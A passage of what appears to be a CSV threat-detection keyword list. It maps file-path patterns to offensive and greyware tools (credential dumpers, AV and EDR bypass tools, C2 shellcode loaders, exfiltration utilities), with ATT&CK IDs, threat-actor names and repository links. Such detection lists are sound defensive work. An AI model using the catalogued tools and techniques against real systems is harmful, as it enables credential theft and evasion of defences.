Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\Temp\Reaper.exe*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*\Temp\RTCore64.sys*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*\TEMP\ScreenConnect\*.ps1*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","screenconnect.com","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*\Temp\whoami.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\tests\beacon64.bin*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" +"*\TGSThief\*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","0","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" +"*\the-backdoor-factory\*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*\ThemeBleed.exe *","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*\ThemeBleed.sln*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*\TheThing.exe*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*\TikiCompiler.txt*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*\TikiService.exe*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*\TikiSpawn.*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*\tikispawn.xml*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*\TikiTorch\Aggressor*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*\tir_blanc_holiseum\*.exe*","greyware_tool_keyword","tir_blanc_holiseum","Ransomware simulation","T1486 - T1204 - T1027 - T1059","TA0040 - TA0002 - TA0005","N/A","N/A","Ransomware","https://www.holiseum.com/services/auditer/tir-a-blanc-ransomware","1","0","N/A","4","6","N/A","N/A","N/A","N/A" +"*\tmp\dll-collection*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*\TokenDump.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*\tokenprivileges.c*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*\tokenprivileges.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*\Tokenvator\*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*\Tor\tor.exe*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*\Tor\torrc*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*\TorBrowser*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*\TrustExec.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*\uac.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\UACME-*.zip*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*\uberfile.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*\unDefender.exe*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" +"*\unquotedsvcpath.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*\updog-master\*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*\usbmon.txt*","offensive_tool_keyword","usbmon","USB capture for Linux.","T1052 - T1059 - T1090 - T1105 - T1114 - T1124 - T1497 - T1557","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://www.kernel.org/doc/Documentation/usb/usbmon.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\Users\*\AppData\Local\GoodSync*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\Users\*\AppData\Local\Temp\*.megatools.cache*","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","9",,"N/A",,, +"*\Users\Public\*.dmp*","greyware_tool_keyword","procdump","Dump files might contain sensitive data and are often created as part of debugging processes or by attackers exfiltrating data. Users\Public should not be used","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\Users\Public\*ntds.dit*","greyware_tool_keyword","wmic","this file shouldn't be found in the Users\Public directory. Its presence could be a sign of an ongoing or past attack.","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\Users\Public\*ntds.jfm*","greyware_tool_keyword","wmic","Like the ntds.dit file it should not normally be found in this directory.","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\Users\Public\nc.exe*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","0","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" +"*\users\public\sam.save*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*\users\public\system.save*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*\Users\Public\termsrv.dll*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" +"*\Users_Nochangedpassword.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\uTorrent\*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\utweb.exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\UUID_bypass.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*\veeam_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\wce32.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" +"*\wce64.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" +"*\wce-beta.zip*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" +"*\wdextract.cpp*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*\wdextract.sln*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*\wdextract.vcxproj*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*\wdextract32.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*\wdextract64.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*\wdigest.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\WdigestOffsets.csv*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*\web_delivery.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\webdav.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\WfpTokenDup.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 